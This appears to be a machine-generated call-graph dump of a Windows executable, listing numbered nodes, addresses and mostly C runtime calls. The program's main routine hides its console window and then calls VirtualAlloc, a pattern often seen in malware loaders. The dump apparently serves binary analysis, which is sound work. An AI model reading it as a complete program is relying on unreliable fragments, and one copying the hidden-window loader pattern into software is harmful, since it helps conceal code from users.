__wsopen_s 25 API calls 7868->7872 7869->7860 7870 40cd77 GetLastError 7869->7870 7870->7860 7871->7867 7872->7863 7874 40a625 7873->7874 7875 40a781 7873->7875 7876 404575 __wsopen_s 25 API calls 7874->7876 7881 40a645 7874->7881 7875->7736 7875->7737 7877 40a63c 7876->7877 7878 40a83d 7877->7878 7877->7881 7879 40507e __wsopen_s 11 API calls 7878->7879 7880 40a847 7879->7880 7881->7875 7883 40a6f9 7881->7883 7884 406ae1 __fread_nolock 27 API calls 7881->7884 7882 4063f9 __fread_nolock 37 API calls 7888 40a71e 7882->7888 7883->7875 7883->7882 7886 40a77c 7883->7886 7890 40a74c 7883->7890 7885 40a760 7884->7885 7889 406ae1 __fread_nolock 27 API calls 7885->7889 7885->7890 7887 40514f __dosmaperr 14 API calls 7886->7887 7887->7875 7888->7886 7888->7890 7891 40a7aa 7888->7891 7892 40a79d 7888->7892 7893 40a7cc 7888->7893 7889->7883 7890->7875 7890->7886 8218 40b800 7890->8218 7891->7893 7896 40a7b1 7891->7896 7895 40514f __dosmaperr 14 API calls 7892->7895 7894 406ae1 __fread_nolock 27 API calls 7893->7894 7894->7890 7895->7886 7897 406ae1 __fread_nolock 27 API calls 7896->7897 7897->7890 7899->7741 7901 408b31 7900->7901 7902 408b98 7900->7902 7901->7902 7908 408b5b __wsopen_s 7901->7908 7903 40514f __dosmaperr 14 API calls 7902->7903 7904 408b9d 7903->7904 7905 40513c __dosmaperr 14 API calls 7904->7905 7906 408b88 7905->7906 7906->7743 7907 408b82 SetStdHandle 7907->7906 7908->7906 7908->7907 7911 40a885 7909->7911 7910 40a8a0 7910->7808 7911->7910 7912 40514f __dosmaperr 14 API calls 7911->7912 7913 40a8c4 7912->7913 7914 40506e __wsopen_s 25 API calls 7913->7914 7915 40a8cf 7914->7915 7915->7808 7917 404581 7916->7917 7918 404596 7916->7918 7919 40514f __dosmaperr 14 API calls 7917->7919 7918->7813 7920 404586 7919->7920 7921 40506e __wsopen_s 25 API calls 7920->7921 7922 404591 7921->7922 7922->7813 7923->7827 7935 4087a1 LeaveCriticalSection 7924->7935 7926 408a89 7926->7709 7926->7710 7928 406f85 __dosmaperr 14 API calls 7927->7928 7929 4087fb 7928->7929 7933 408808 7929->7933 7936 409718 7929->7936 7930 406fe2 _free 14 API calls 7932 40885d 7930->7932 7932->7822 7934 408937 EnterCriticalSection 7932->7934 7933->7930 7934->7822 7935->7926 7937 4094da __dosmaperr 5 API calls 7936->7937 7938 409734 7937->7938 7939 409752 InitializeCriticalSectionAndSpinCount 7938->7939 7940 40973d 7938->7940 7939->7940 7940->7929 8046 406a4a 7941->8046 7945 406423 7944->7945 7946 40640b 7944->7946 7948 40678a 7945->7948 7953 406463 7945->7953 7947 40513c __dosmaperr 14 API calls 7946->7947 7949 406410 7947->7949 7950 40513c __dosmaperr 14 API calls 7948->7950 7951 40514f __dosmaperr 14 API calls 7949->7951 7952 40678f 7950->7952 7955 406418 7951->7955 7956 40514f __dosmaperr 14 API calls 7952->7956 7954 40646e 7953->7954 7953->7955 7962 40649d 7953->7962 7957 40513c __dosmaperr 14 API calls 7954->7957 7955->7854 8011 40ca8e 7955->8011 7958 40647b 7956->7958 7959 406473 7957->7959 7960 40506e __wsopen_s 25 API calls 7958->7960 7961 40514f __dosmaperr 14 API calls 7959->7961 7960->7955 7961->7958 7963 4064b6 7962->7963 7964 4064d1 7962->7964 7965 40650d 7962->7965 7963->7964 7966 4064bb 7963->7966 7968 40513c __dosmaperr 14 API calls 7964->7968 7969 408ea0 __fread_nolock 15 API calls 7965->7969 8068 40aeb9 7966->8068 7970 4064d6 7968->7970 7972 406524 7969->7972 7973 40514f __dosmaperr 14 API calls 7970->7973 7976 406fe2 _free 14 API calls 7972->7976 7974 4064dd 7973->7974 7977 40506e __wsopen_s 25 API calls 7974->7977 7975 406664 7978 4066da 7975->7978 7981 40667d GetConsoleMode 7975->7981 7979 40652d 7976->7979 8008 4064e8 __fread_nolock 7977->8008 7980 4066de ReadFile 7978->7980 7982 406fe2 _free 14 API calls 7979->7982 7983 406752 GetLastError 7980->7983 7984 4066f8 7980->7984 7981->7978 7985 40668e 7981->7985 7986 406534 7982->7986 7987 4066b6 7983->7987 7988 40675f 7983->7988 7984->7983 7989 4066cf 7984->7989 7985->7980 7990 406694 ReadConsoleW 7985->7990 7991 406559 7986->7991 7992 40653e 7986->7992 8001 405119 __dosmaperr 14 API calls 7987->8001 7987->8008 7993 40514f __dosmaperr 14 API calls 7988->7993 8004 406734 7989->8004 8005 40671d 7989->8005 7989->8008 7990->7989 7995 4066b0 GetLastError 7990->7995 7994 406ae1 __fread_nolock 27 API calls 7991->7994 7997 40514f __dosmaperr 14 API calls 7992->7997 7999 406764 7993->7999 8000 406565 7994->8000 7995->7987 7996 406fe2 _free 14 API calls 7996->7955 7998 406543 7997->7998 8002 40513c __dosmaperr 14 API calls 7998->8002 8003 40513c __dosmaperr 14 API calls 7999->8003 8000->7966 8001->8008 8006 40654e 8002->8006 8003->8008 8004->8008 8009 40674b 8004->8009 8077 406113 8005->8077 8006->8008 8008->7996 8090 405f42 8009->8090 8100 40ca41 8011->8100 8013 40cbdd 8014 40514f __dosmaperr 14 API calls 8013->8014 8023 40cb63 8014->8023 8016 40cae4 8019 406f85 __dosmaperr 14 API calls 8016->8019 8017 406ae1 __fread_nolock 27 API calls 8021 40cba7 8017->8021 8018 40cb8f 8018->8017 8018->8023 8022 40caf0 8019->8022 8020 406ae1 __fread_nolock 27 API calls 8024 40cbf4 8020->8024 8021->8013 8026 408bb3 __wsopen_s 25 API calls 8021->8026 8025 40caf8 8022->8025 8039 40cb05 __wsopen_s 8022->8039 8023->8020 8024->7854 8027 40514f __dosmaperr 14 API calls 8025->8027 8028 40cbb7 SetEndOfFile 8026->8028 8029 40cafd 8027->8029 8028->8023 8030 40cbc3 8028->8030 8033 40514f __dosmaperr 14 API calls 8029->8033 8031 40514f __dosmaperr 14 API calls 8030->8031 8032 40cbc8 8031->8032 8034 40513c __dosmaperr 14 API calls 8032->8034 8035 40cb84 8033->8035 8037 40cbd3 GetLastError 8034->8037 8038 406fe2 _free 14 API calls 8035->8038 8037->8013 8038->8023 8040 40cb6a 8039->8040 8042 40cb54 __wsopen_s 8039->8042 8105 40b8f2 8039->8105 8041 40513c __dosmaperr 14 API calls 8040->8041 8043 40cb6f 8041->8043 8045 406fe2 _free 14 API calls 8042->8045 8043->8029 8044 40514f __dosmaperr 14 API calls 8043->8044 8044->8029 8045->8023 8055 408bb3 8046->8055 8048 406a5c 8049 406a64 8048->8049 8050 406a75 SetFilePointerEx 8048->8050 8051 40514f __dosmaperr 14 API calls 8049->8051 8052 406a69 8050->8052 8053 406a8d GetLastError 8050->8053 8051->8052 8052->7848 8052->7849 8054 405119 __dosmaperr 14 API calls 8053->8054 8054->8052 8056 408bc0 8055->8056 8057 408bd5 8055->8057 8058 40513c __dosmaperr 14 API calls 8056->8058 8059 40513c __dosmaperr 14 API calls 8057->8059 8061 408bfa 8057->8061 8060 408bc5 8058->8060 8062 408c05 8059->8062 8063 40514f __dosmaperr 14 API calls 8060->8063 8061->8048 8064 40514f __dosmaperr 14 API calls 8062->8064 8065 408bcd 8063->8065 8066 408c0d 8064->8066 8065->8048 8067 40506e __wsopen_s 25 API calls 8066->8067 8067->8065 8069 40aed3 8068->8069 8070 40aec6 8068->8070 8073 40aedf 8069->8073 8074 40514f __dosmaperr 14 API calls 8069->8074 8071 40514f __dosmaperr 14 API calls 8070->8071 8072 40aecb 8071->8072 8072->7975 8073->7975 8075 40af00 8074->8075 8076 40506e __wsopen_s 25 API calls 8075->8076 8076->8072 8095 405de1 8077->8095 8079 4081cc __fassign MultiByteToWideChar 8081 406227 8079->8081 8083 406230 GetLastError 8081->8083 8086 40615b 8081->8086 8082 4061a5 8084 40514f __dosmaperr 14 API calls 8082->8084 8085 405119 __dosmaperr 14 API calls 8083->8085 8084->8086 8085->8086 8086->8008 8087 4061b5 8088 406ae1 __fread_nolock 27 API calls 8087->8088 8089 40616f 8087->8089 8088->8089 8089->8079 8091 405f7d 8090->8091 8092 40600e ReadFile 8091->8092 8093 4060e5 8091->8093 8094 406ae1 __fread_nolock 27 API calls 8091->8094 8092->8091 8093->8006 8094->8091 8098 405e15 8095->8098 8096 405f1c 8096->8082 8096->8086 8096->8087 8096->8089 8097 405e84 ReadFile 8097->8098 8098->8096 8098->8097 8099 406ae1 __fread_nolock 27 API calls 8098->8099 8099->8098 8101 406ae1 __fread_nolock 27 API calls 8100->8101 8102 40ca5a 8101->8102 8103 406ae1 __fread_nolock 27 API calls 8102->8103 8104 40ca69 8103->8104 8104->8013 8104->8016 8104->8018 8106 40b914 8105->8106 8107 40b930 8105->8107 8108 40b918 8106->8108 8111 40b968 8106->8111 8107->8039 8109 40513c __dosmaperr 14 API calls 8108->8109 8110 40b91d 8109->8110 8113 40514f __dosmaperr 14 API calls 8110->8113 8112 40b97b 8111->8112 8114 406ae1 __fread_nolock 27 API calls 8111->8114 8147 40b499 8112->8147 8116 40b925 8113->8116 8114->8112 8118 40506e __wsopen_s 25 API calls 8116->8118 8118->8107 8119 40b9d0 8121 40b9e4 8119->8121 8122 40ba29 WriteFile 8119->8122 8120 40b991 8123 40b995 8120->8123 8124 40b9ba 8120->8124 8125 40ba19 8121->8125 8126 40b9ef 8121->8126 8127 40ba4d GetLastError 8122->8127 8134 40b9b0 8122->8134 8123->8134 8154 40b431 8123->8154 8159 40b087 GetConsoleCP 8124->8159 8187 40b50a 8125->8187 8129 40b9f4 8126->8129 8130 40ba09 8126->8130 8127->8134 8129->8134 8172 40b5e5 8129->8172 8179 40b6ce 8130->8179 8134->8107 8135 40ba73 8134->8135 8136 40ba9d 8134->8136 8138 40ba91 8135->8138 8139 40ba7a 8135->8139 8136->8107 8142 40514f __dosmaperr 14 API calls 8136->8142 8141 405119 __dosmaperr 14 API calls 8138->8141 8140 40514f __dosmaperr 14 API calls 8139->8140 8144 40ba7f 8140->8144 8141->8107 8143 40bab5 8142->8143 8145 40513c __dosmaperr 14 API calls 8143->8145 8146 40513c __dosmaperr 14 API calls 8144->8146 8145->8107 8146->8107 8148 40aeb9 __fread_nolock 25 API calls 8147->8148 8149 40b4aa 8148->8149 8150 40b500 8149->8150 8151 4054a0 __fassign 37 API calls 8149->8151 8150->8119 8150->8120 8152 40b4cd 8151->8152 8152->8150 8153 40b4e7 GetConsoleMode 8152->8153 8153->8150 8157 40b453 8154->8157 8158 40b488 8154->8158 8155 40cdb3 5 API calls __wsopen_s 8155->8157 8156 40b48a GetLastError 8156->8158 8157->8155 8157->8156 8157->8158 8158->8134 8160 402ce0 __fassign 37 API calls 8159->8160 8163 40b0e3 __fread_nolock 8160->8163 8161 401c75 _ValidateLocalCookies 5 API calls 8162 40b42f 8161->8162 8162->8134 8165 40a2aa 38 API calls __fassign 8163->8165 8167 40b383 8163->8167 8169 40b306 WriteFile 8163->8169 8171 40b33e WriteFile 8163->8171 8194 40c7be 8163->8194 8204 4050b2 8163->8204 8209 408248 8163->8209 8165->8163 8167->8161 8169->8163 8170 40b3ff GetLastError 8169->8170 8170->8167 8171->8163 8171->8170 8173 40b5f4 __wsopen_s 8172->8173 8174 40b6b3 8173->8174 8175 40b669 WriteFile 8173->8175 8176 401c75 _ValidateLocalCookies 5 API calls 8174->8176 8175->8173 8177 40b6b5 GetLastError 8175->8177 8178 40b6cc 8176->8178 8177->8174 8178->8134 8182 40b6dd __wsopen_s 8179->8182 8180 401c75 _ValidateLocalCookies 5 API calls 8181 40b7fe 8180->8181 8181->8134 8183 408248 __wsopen_s WideCharToMultiByte 8182->8183 8184 40b7e7 GetLastError 8182->8184 8185 40b79c WriteFile 8182->8185 8186 40b7e5 8182->8186 8183->8182 8184->8186 8185->8182 8185->8184 8186->8180 8188 40b519 __wsopen_s 8187->8188 8191 40b589 WriteFile 8188->8191 8193 40b5ca 8188->8193 8189 401c75 _ValidateLocalCookies 5 API calls 8190 40b5e3 8189->8190 8190->8134 8191->8188 8192 40b5cc GetLastError 8191->8192 8192->8193 8193->8189 8197 40c7d7 __wsopen_s 8194->8197 8200 40c873 __wsopen_s 8194->8200 8195 40d0d2 __fassign 19 API calls 8195->8200 8198 40c85e 8197->8198 8203 40c849 8197->8203 8212 40d0d2 8197->8212 8202 40514f __dosmaperr 14 API calls 8198->8202 8199 40c8a3 8201 40514f __dosmaperr 14 API calls 8199->8201 8200->8195 8200->8199 8200->8203 8201->8203 8202->8203 8203->8163 8205 4054a0 __fassign 37 API calls 8204->8205 8206 4050bd 8205->8206 8207 4056f2 __fassign 37 API calls 8206->8207 8208 4050cd 8207->8208 8208->8163 8211 408261 WideCharToMultiByte 8209->8211 8211->8163 8216 40d0f9 8212->8216 8213 401c75 _ValidateLocalCookies 5 API calls 8215 40d277 8213->8215 8214 40c8b9 __fassign 14 API calls 8217 40d11e 8214->8217 8215->8197 8216->8214 8216->8217 8217->8213 8219 40b80c ___scrt_is_nonwritable_in_current_image 8218->8219 8220 40b814 8219->8220 8221 40b82c 8219->8221 8222 40513c __dosmaperr 14 API calls 8220->8222 8223 40b8c7 8221->8223 8227 40b85e 8221->8227 8224 40b819 8222->8224 8225 40513c __dosmaperr 14 API calls 8223->8225 8226 40514f __dosmaperr 14 API calls 8224->8226 8228 40b8cc 8225->8228 8242 40b821 8226->8242 8243 408937 EnterCriticalSection 8227->8243 8230 40514f __dosmaperr 14 API calls 8228->8230 8232 40b8d4 8230->8232 8231 40b864 8233 40b880 8231->8233 8234 40b895 8231->8234 8235 40506e __wsopen_s 25 API calls 8232->8235 8237 40514f __dosmaperr 14 API calls 8233->8237 8236 40b8f2 __wsopen_s 60 API calls 8234->8236 8235->8242 8238 40b890 8236->8238 8239 40b885 8237->8239 8244 40b8bf 8238->8244 8240 40513c __dosmaperr 14 API calls 8239->8240 8240->8238 8242->7890 8243->8231 8247 4089ec LeaveCriticalSection 8244->8247 8246 40b8c5 8246->8242 8247->8246 8248->7691 8249 401318 8254 401982 SetUnhandledExceptionFilter 8249->8254 8251 40131d 8255 4047dc 8251->8255 8253 401328 8254->8251 8256 404802 8255->8256 8257 4047e8 8255->8257 8256->8253 8257->8256 8258 40514f __dosmaperr 14 API calls 8257->8258 8259 4047f2 8258->8259 8260 40506e __wsopen_s 25 API calls 8259->8260 8261 4047fd 8260->8261 8261->8253 8262 4067a9 8263 4067b6 8262->8263 8266 4067ce 8262->8266 8264 40514f __dosmaperr 14 API calls 8263->8264 8265 4067bb 8264->8265 8267 40506e __wsopen_s 25 API calls 8265->8267 8268 40682d 8266->8268 8276 4067c6 8266->8276 8319 40af0f 8266->8319 8267->8276 8282 405dba 8268->8282 8271 406845 8289 4062e5 8271->8289 8274 405dba __fread_nolock 25 API calls 8275 406879 8274->8275 8275->8276 8277 405dba __fread_nolock 25 API calls 8275->8277 8278 406887 8277->8278 8278->8276 8279 405dba __fread_nolock 25 API calls 8278->8279 8280 406897 8279->8280 8281 405dba __fread_nolock 25 API calls 8280->8281 8281->8276 8283 405dc6 8282->8283 8284 405ddb 8282->8284 8285 40514f __dosmaperr 14 API calls 8283->8285 8284->8271 8286 405dcb 8285->8286 8287 40506e __wsopen_s 25 API calls 8286->8287 8288 405dd6 8287->8288 8288->8271 8290 4062f1 ___scrt_is_nonwritable_in_current_image 8289->8290 8291 4062f9 8290->8291 8293 406311 8290->8293 8292 40513c __dosmaperr 14 API calls 8291->8292 8295 4062fe 8292->8295 8294 4063ce 8293->8294 8299 406347 8293->8299 8296 40513c __dosmaperr 14 API calls 8294->8296 8298 40514f __dosmaperr 14 API calls 8295->8298 8297 4063d3 8296->8297 8300 40514f __dosmaperr 14 API calls 8297->8300 8318 406306 8298->8318 8301 406350 8299->8301 8302 406365 8299->8302 8304 40635d 8300->8304 8305 40513c __dosmaperr 14 API calls 8301->8305 8324 408937 EnterCriticalSection 8302->8324 8310 40506e __wsopen_s 25 API calls 8304->8310 8307 406355 8305->8307 8306 40636b 8308 406387 8306->8308 8309 40639c 8306->8309 8311 40514f __dosmaperr 14 API calls 8307->8311 8312 40514f __dosmaperr 14 API calls 8308->8312 8313 4063f9 __fread_nolock 37 API calls 8309->8313 8310->8318 8311->8304 8314 40638c 8312->8314 8315 406397 8313->8315 8316 40513c __dosmaperr 14 API calls 8314->8316 8325 4063c6 8315->8325 8316->8315 8318->8274 8318->8276 8320 408ea0 __fread_nolock 15 API calls 8319->8320 8321 40af2a 8320->8321 8322 406fe2 _free 14 API calls 8321->8322 8323 40af34 8322->8323 8323->8268 8324->8306 8328 4089ec LeaveCriticalSection 8325->8328 8327 4063cc 8327->8318 8328->8327 8329 40132a 8330 401336 ___scrt_is_nonwritable_in_current_image 8329->8330 8355 40152c 8330->8355 8332 40133d 8333 401496 8332->8333 8342 401367 ___scrt_is_nonwritable_in_current_image __fassign ___scrt_release_startup_lock 8332->8342 8385 401820 IsProcessorFeaturePresent 8333->8385 8335 40149d 8336 4014a3 8335->8336 8389 40455f 8335->8389 8338 404523 __fassign 23 API calls 8336->8338 8339 4014ab 8338->8339 8340 401386 8342->8340 8345 401407 8342->8345 8379 404539 8342->8379 8344 40140d 8370 401000 GetConsoleWindow ShowWindow 8344->8370 8366 4041f4 8345->8366 8356 401535 8355->8356 8392 401a95 IsProcessorFeaturePresent 8356->8392 8360 401546 8361 40154a 8360->8361 8402 404c64 8360->8402 8361->8332 8364 401561 8364->8332 8367 404202 8366->8367 8368 4041fd 8366->8368 8367->8344 8516 403f58 8368->8516 8760 402e3c 8370->8760 8374 401056 8375 403430 64 API calls 8374->8375 8376 401075 VirtualAlloc 8375->8376 8766 403039 8376->8766 8380 40454f ___scrt_is_nonwritable_in_current_image __dosmaperr 8379->8380 8380->8345 8381 4054a0 __fassign 37 API calls 8380->8381 8382 404d16 8381->8382 8383 404db6 __fassign 37 API calls 8382->8383 8384 404d40 8383->8384 8386 401836 __fread_nolock __fassign 8385->8386 8387 4018e1 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8386->8387 8388 40192c __fassign 8387->8388 8388->8335 8390 4043ba __fassign 23 API calls 8389->8390 8391 404570 8390->8391 8391->8336 8393 401541 8392->8393 8394 4020ae 8393->8394 8411 4024a1 8394->8411 8397 4020b7 8397->8360 8399 4020bf 8400 4020ca 8399->8400 8425 4024dd 8399->8425 8400->8360 8465 4098da 8402->8465 8405 4020cd 8406 4020e0 8405->8406 8407 4020d6 8405->8407 8406->8361 8408 402486 ___vcrt_uninitialize_ptd 6 API calls 8407->8408 8409 4020db 8408->8409 8410 4024dd ___vcrt_uninitialize_locks DeleteCriticalSection 8409->8410 8410->8406 8414 4024aa 8411->8414 8413 4024d3 8416 4024dd ___vcrt_uninitialize_locks DeleteCriticalSection 8413->8416 8414->8413 8415 4020b3 8414->8415 8429 40270d 8414->8429 8415->8397 8417 402453 8415->8417 8416->8415 8446 40261e 8417->8446 8422 402483 8422->8399 8424 402468 8424->8399 8426 4024e8 8425->8426 8428 402507 8425->8428 8427 4024f2 DeleteCriticalSection 8426->8427 8427->8427 8427->8428 8428->8397 8434 402533 8429->8434 8432 402745 InitializeCriticalSectionAndSpinCount 8433 402730 8432->8433 8433->8414 8435 402550 8434->8435 8438 402554 8434->8438 8435->8432 8435->8433 8436 4025bc GetProcAddress 8436->8435 8438->8435 8438->8436 8439 4025ad 8438->8439 8441 4025d3 LoadLibraryExW 8438->8441 8439->8436 8440 4025b5 FreeLibrary 8439->8440 8440->8436 8442 4025ea GetLastError 8441->8442 8443 40261a 8441->8443 8442->8443 8444 4025f5 ___vcrt_FlsFree 8442->8444 8443->8438 8444->8443 8445 40260b LoadLibraryExW 8444->8445 8445->8438 8447 402533 ___vcrt_FlsFree 5 API calls 8446->8447 8448 402638 8447->8448 8449 402651 TlsAlloc 8448->8449 8450 40245d 8448->8450 8450->8424 8451 4026cf 8450->8451 8452 402533 ___vcrt_FlsFree 5 API calls 8451->8452 8453 4026e9 8452->8453 8454 402704 TlsSetValue 8453->8454 8455 402476 8453->8455 8454->8455 8455->8422 8456 402486 8455->8456 8457 402490 8456->8457 8458 402496 8456->8458 8460 402659 8457->8460 8458->8424 8461 402533 ___vcrt_FlsFree 5 API calls 8460->8461 8462 402673 8461->8462 8463 40268b TlsFree 8462->8463 8464 40267f 8462->8464 8463->8464 8464->8458 8466 4098ea 8465->8466 8467 401553 8465->8467 8466->8467 8470 406e45 8466->8470 8475 406ef9 8466->8475 8467->8364 8467->8405 8471 406e4c 8470->8471 8472 406e8f GetStdHandle 8471->8472 8473 406ef5 8471->8473 8474 406ea2 GetFileType 8471->8474 8472->8471 8473->8466 8474->8471 8476 406f05 ___scrt_is_nonwritable_in_current_image 8475->8476 8487 408759 EnterCriticalSection 8476->8487 8478 406f0c 8488 408899 8478->8488 8481 406f2a 8507 406f50 8481->8507 8486 406e45 2 API calls 8486->8481 8487->8478 8489 4088a5 ___scrt_is_nonwritable_in_current_image 8488->8489 8490 4088ae 8489->8490 8491 4088cf 8489->8491 8492 40514f __dosmaperr 14 API calls 8490->8492 8510 408759 EnterCriticalSection 8491->8510 8494 4088b3 8492->8494 8496 40506e __wsopen_s 25 API calls 8494->8496 8495 4088db 8499 4087e9 __wsopen_s 15 API calls 8495->8499 8500 408907 8495->8500 8497 406f1b 8496->8497 8497->8481 8501 406d8f GetStartupInfoW 8497->8501 8499->8495 8511 40892e 8500->8511 8502 406dac 8501->8502 8504 406e40 8501->8504 8503 408899 26 API calls 8502->8503 8502->8504 8505 406dd4 8503->8505 8504->8486 8505->8504 8506 406e04 GetFileType 8505->8506 8506->8505 8515 4087a1 LeaveCriticalSection 8507->8515 8509 406f3b 8509->8466 8510->8495 8514 4087a1 LeaveCriticalSection 8511->8514 8513 408935 8513->8497 8514->8513 8515->8509 8517 403f61 8516->8517 8520 403f77 8516->8520 8517->8520 8522 403f84 8517->8522 8519 403f6e 8519->8520 8535 4040d6 8519->8535 8520->8367 8523 403f90 8522->8523 8524 403f8d 8522->8524 8543 407f0f 8523->8543 8524->8519 8530 406fe2 _free 14 API calls 8532 403fd1 8530->8532 8532->8519 8533 406fe2 _free 14 API calls 8534 403fa2 8533->8534 8534->8530 8536 404147 8535->8536 8541 4040e5 8535->8541 8536->8520 8537 408248 WideCharToMultiByte __wsopen_s 8537->8541 8538 406f85 __dosmaperr 14 API calls 8538->8541 8539 40414b 8540 406fe2 _free 14 API calls 8539->8540 8540->8536 8541->8536 8541->8537 8541->8538 8541->8539 8542 406fe2 _free 14 API calls 8541->8542 8542->8541 8544 407f18 8543->8544 8548 403f97 8543->8548 8580 40555d 8544->8580 8549 40832c GetEnvironmentStringsW 8548->8549 8550 408343 8549->8550 8551 40839c 8549->8551 8554 408248 __wsopen_s WideCharToMultiByte 8550->8554 8552 4083a2 FreeEnvironmentStringsW 8551->8552 8553 403f9c 8551->8553 8552->8553 8553->8534 8563 403fd7 8553->8563 8555 40835c 8554->8555 8555->8551 8556 408366 8555->8556 8557 408ea0 __fread_nolock 15 API calls 8556->8557 8558 40836c 8557->8558 8559 408248 __wsopen_s WideCharToMultiByte 8558->8559 8562 408384 8558->8562 8559->8562 8560 406fe2 _free 14 API calls 8561 408399 8560->8561 8561->8551 8562->8560 8564 403fec 8563->8564 8565 406f85 __dosmaperr 14 API calls 8564->8565 8570 404013 8565->8570 8566 406fe2 _free 14 API calls 8568 403fad 8566->8568 8567 404078 8567->8566 8568->8533 8569 406f85 __dosmaperr 14 API calls 8569->8570 8570->8567 8570->8569 8571 40407a 8570->8571 8575 40409a 8570->8575 8578 406fe2 _free 14 API calls 8570->8578 8745 404d5c 8570->8745 8754 4040a7 8571->8754 8577 40507e __wsopen_s 11 API calls 8575->8577 8576 406fe2 _free 14 API calls 8576->8567 8579 4040a6 8577->8579 8578->8570 8581 40556e 8580->8581 8582 405568 8580->8582 8584 4096d6 __dosmaperr 6 API calls 8581->8584 8602 405574 8581->8602 8583 409697 __dosmaperr 6 API calls 8582->8583 8583->8581 8585 405588 8584->8585 8587 406f85 __dosmaperr 14 API calls 8585->8587 8585->8602 8586 404db6 __fassign 37 API calls 8589 4055f6 8586->8589 8588 405598 8587->8588 8590 4055a0 8588->8590 8591 4055b5 8588->8591 8593 4096d6 __dosmaperr 6 API calls 8590->8593 8594 4096d6 __dosmaperr 6 API calls 8591->8594 8592 4055ed 8605 407d56 8592->8605 8595 4055ac 8593->8595 8596 4055c1 8594->8596 8599 406fe2 _free 14 API calls 8595->8599 8597 4055d4 8596->8597 8598 4055c5 8596->8598 8601 4052ce __dosmaperr 14 API calls 8597->8601 8600 4096d6 __dosmaperr 6 API calls 8598->8600 8599->8602 8600->8595 8603 4055df 8601->8603 8602->8586 8602->8592 8604 406fe2 _free 14 API calls 8603->8604 8604->8602 8606 407e6f __fassign 37 API calls 8605->8606 8607 407d69 8606->8607 8624 407aff 8607->8624 8610 407d82 8610->8548 8611 408ea0 __fread_nolock 15 API calls 8613 407d93 8611->8613 8612 407dc5 8615 406fe2 _free 14 API calls 8612->8615 8613->8612 8631 407f6a 8613->8631 8617 407dd3 8615->8617 8617->8548 8618 407dc0 8619 40514f __dosmaperr 14 API calls 8618->8619 8619->8612 8620 407e07 8620->8612 8642 4079f1 8620->8642 8621 407ddb 8621->8620 8622 406fe2 _free 14 API calls 8621->8622 8622->8620 8625 402ce0 __fassign 37 API calls 8624->8625 8626 407b11 8625->8626 8627 407b20 GetOEMCP 8626->8627 8628 407b32 8626->8628 8629 407b49 8627->8629 8628->8629 8630 407b37 GetACP 8628->8630 8629->8610 8629->8611 8630->8629 8632 407aff 39 API calls 8631->8632 8633 407f8a 8632->8633 8635 407fc4 IsValidCodePage 8633->8635 8639 408000 __fread_nolock 8633->8639 8634 401c75 _ValidateLocalCookies 5 API calls 8636 407db8 8634->8636 8637 407fd6 8635->8637 8635->8639 8636->8618 8636->8621 8638 408005 GetCPInfo 8637->8638 8641 407fdf __fread_nolock 8637->8641 8638->8639 8638->8641 8639->8634 8650 407bd5 8641->8650 8643 4079fd ___scrt_is_nonwritable_in_current_image 8642->8643 8719 408759 EnterCriticalSection 8643->8719 8645 407a07 8720 407a3e 8645->8720 8651 407bfd GetCPInfo 8650->8651 8660 407cc6 8650->8660 8654 407c15 8651->8654 8651->8660 8652 401c75 _ValidateLocalCookies 5 API calls 8653 407d54 8652->8653 8653->8639 8661 408eee 8654->8661 8659 40c2fe 41 API calls 8659->8660 8660->8652 8662 402ce0 __fassign 37 API calls 8661->8662 8663 408f0e 8662->8663 8664 4081cc __fassign MultiByteToWideChar 8663->8664 8665 408f3b 8664->8665 8667 408f61 __fread_nolock 8665->8667 8668 408ea0 __fread_nolock 15 API calls 8665->8668 8672 408fcc 8665->8672 8666 401c75 _ValidateLocalCookies 5 API calls 8669 407c7d 8666->8669 8670 408fc6 8667->8670 8673 4081cc __fassign MultiByteToWideChar 8667->8673 8668->8667 8676 40c2fe 8669->8676 8681 408ff1 8670->8681 8672->8666 8674 408faf 8673->8674 8674->8670 8675 408fb6 GetStringTypeW 8674->8675 8675->8670 8677 402ce0 __fassign 37 API calls 8676->8677 8678 40c311 8677->8678 8685 40c114 8678->8685 8682 408ffd 8681->8682 8684 40900e 8681->8684 8683 406fe2 _free 14 API calls 8682->8683 8682->8684 8683->8684 8684->8672 8686 40c12f 8685->8686 8687 4081cc __fassign MultiByteToWideChar 8686->8687 8691 40c173 8687->8691 8688 40c2d8 8689 401c75 _ValidateLocalCookies 5 API calls 8688->8689 8690 407c9e 8689->8690 8690->8659 8691->8688 8693 408ea0 __fread_nolock 15 API calls 8691->8693 8695 40c198 8691->8695 8692 40c23d 8697 408ff1 __freea 14 API calls 8692->8697 8693->8695 8694 4081cc __fassign MultiByteToWideChar 8696 40c1de 8694->8696 8695->8692 8695->8694 8696->8692 8713 409763 8696->8713 8697->8688 8700 40c214 8700->8692 8704 409763 6 API calls 8700->8704 8701 40c24c 8702 408ea0 __fread_nolock 15 API calls 8701->8702 8707 40c25e 8701->8707 8702->8707 8703 40c2c9 8706 408ff1 __freea 14 API calls 8703->8706 8704->8692 8705 409763 6 API calls 8708 40c2a6 8705->8708 8706->8692 8707->8703 8707->8705 8708->8703 8709 408248 __wsopen_s WideCharToMultiByte 8708->8709 8710 40c2c0 8709->8710 8710->8703 8711 40c2f5 8710->8711 8712 408ff1 __freea 14 API calls 8711->8712 8712->8692 8714 4093df LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 8713->8714 8715 40976e 8714->8715 8716 4097c0 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 8715->8716 8718 409774 8715->8718 8717 4097b4 LCMapStringW 8716->8717 8717->8718 8718->8692 8718->8700 8718->8701 8719->8645 8730 4030f3 8720->8730 8722 407a60 8723 4030f3 __fread_nolock 25 API calls 8722->8723 8724 407a7f 8723->8724 8725 406fe2 _free 14 API calls 8724->8725 8726 407a14 8724->8726 8725->8726 8727 407a32 8726->8727 8744 4087a1 LeaveCriticalSection 8727->8744 8729 407a20 8729->8612 8731 403104 8730->8731 8739 403100 __fread_nolock 8730->8739 8732 40310b 8731->8732 8733 40311e __fread_nolock 8731->8733 8734 40514f __dosmaperr 14 API calls 8732->8734 8737 403155 8733->8737 8738 40314c 8733->8738 8733->8739 8735 403110 8734->8735 8736 40506e __wsopen_s 25 API calls 8735->8736 8736->8739 8737->8739 8742 40514f __dosmaperr 14 API calls 8737->8742 8740 40514f __dosmaperr 14 API calls 8738->8740 8739->8722 8741 403151 8740->8741 8743 40506e __wsopen_s 25 API calls 8741->8743 8742->8741 8743->8739 8744->8729 8746 404d69 8745->8746 8747 404d77 8745->8747 8746->8747 8752 404d8e 8746->8752 8748 40514f __dosmaperr 14 API calls 